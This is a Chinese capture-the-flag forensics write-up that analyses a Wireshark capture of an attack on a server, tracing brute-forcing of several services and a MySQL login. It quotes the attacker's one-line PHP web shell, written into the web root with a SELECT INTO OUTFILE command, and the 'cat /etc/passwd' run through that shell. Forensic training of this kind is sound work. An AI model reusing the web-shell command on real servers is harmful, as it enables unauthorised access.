Wireshark数据包分析(详细解析)

wireshark数据包分析

Wireshark(前称Ethereal)是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。

数据包分析器又名嗅探(Sniffers),是一种网络流量数据分析的手段,常见于网络安全领域使用,也有用于业务分析领域,一般是指使用嗅探器对数据流的数据截获与分组分析(Packet analysis)。

wireshark下载地址 https://www.wireshark.org/download.html

以上摘自百度

1.某公司网络系统存在异常,猜测可能有黑客对公司的服务器实施了一系列的扫描和攻击,使用Wireshark抓包分析软件查看并分析Kali Linux的/root目录下dump.pcapng数据包文件,找到黑客的IP地址,并将黑客的IP地址作为Flag值(如:172.16.1.1)提交;

过滤tcp.connection.syn (tcp)包

Source来源,Destination目的地

来源地址172.16.1.110,所以黑客ip172.16.1.110
在这里插入图片描述
2.继续分析数据包文件dump.pcapng分析出黑客通过工具对目标服务器的哪些服务进行了密码暴力枚举渗透测试,将服务对应的端口依照从小到大的顺序依次排列作为Flag值(如:77/88/99/166/1888)提交;

过滤tcp.connection.syn and ip.src == 172.16.1.110

发现ftp,ssh,telnet,mysql,所以端口有21/22/23/3306
在这里插入图片描述
3.黑客扫描后可能首先对目标服务器的某个服务实施了攻击,继续查看数据包文件dump.pcapng分析出黑客成功破解了哪个服务的密码,并将该服务的版本号作为Flag值(如:5.1.10)提交;

过滤 ip.addr == 172.16.1.110 and tcp.port == 3306

request请求,追踪流TCP,服务版本5.7.26

在这里插入图片描述
4.继续分析数据包文件dump.pcapng,黑客通过数据库写入了木马,将写入的木马名称作为Flag值提交(名称不包含后缀);

过滤mysql,黑客利用mysql上传了一个php木马,tcp追踪流

发现黑客在/var/www/html上传,horse.php木马
在这里插入图片描述

5.继续分析数据包文件dump.pcapng,黑客通过数据库写入了木马,将黑客写入的一句话木马的连接密码作为Flag值提交;

黑客在mysql写入,select ‘<?php @eval($_POST[lqsym])?>’ into outfile ‘/avr/www/html/horse.php’

在这里插入图片描述

6.继续分析数据包文件dump.pcapng,找出黑客连接一句话木马后查看了什么文件,将黑客查看的文件名称作为Flag值提交;

黑客是在/var/www/html上传的木马,所以要在数据包过滤http

http connections “horse.php”

在这里插入图片描述
追踪流,HTTP,发现路径遍,黑客使用了cat /etc/passwd命令,所以黑客查看的文件名称是passwd
在这里插入图片描述

7.继续分析数据包文件dump.pcapng,黑客可能找到异常用户后再次对目标服务器的某个服务进行了密码暴力枚举渗透,成功破解出服务的密码后登录到服务器中下载了一张图片,将图片文件中的英文单词作为Flag值提交。

发现黑客使用了/etc/passwd路径遍历发现suictsr247用户

在这里插入图片描述
在主页搜索字符串suictsr247
在这里插入图片描述
黑客对靶机实施ftp暴力破解,使用过滤规则ftp contains “230” 进行过滤

在这里插入图片描述
追踪流tcp
在这里插入图片描述
会话流发现flag.jpg的文件大小为56489字节
过滤ftp-data
追踪任意一个包,TCP,要改为原始数据查看
在这里插入图片描述
在这里插入图片描述


原文连接:https://blog.csdn.net/weixin_51957047/article/details/123891593

相关推荐

通过webservice实现springboot项目间接口调用与对象传递

声网传输层协议 AUT 的总结与展望丨Dev for Dev 专栏

Kafka的TCP链接

网络层协议 ——— IP协议

iOS网络协议栈原理(六) -- URLProtocolClient

【5G NR】UE注册流程

交换机与路由器技术:以太网MAC和以太网帧、交换机工作原理及基本配置

【计网实验报告】Cisco局域网模拟组建、简单网络测试

图解网络:什么是虚拟路由器冗余协议 VRRP?

Wireshark TS | TCP 握手异常问题

Wireshark 提示和技巧 | 如何匿名化数据包

【计算机网络】万字总结

一天上手Aurora 8B/10B IP核(5)----从Framing接口的官方例程学起

一次网络连通性监控误报问题诊断

Wireshark TS | 传输文件慢问题

声网自研传输层协议 AUT 的落地实践丨Dev for Dev 专栏

iOS网络协议栈原理(二) -- URLSessionTask层

从java代码到网络编程

Wireshark TS | 重复 IP ID 问题

微秒级 TCP 时间戳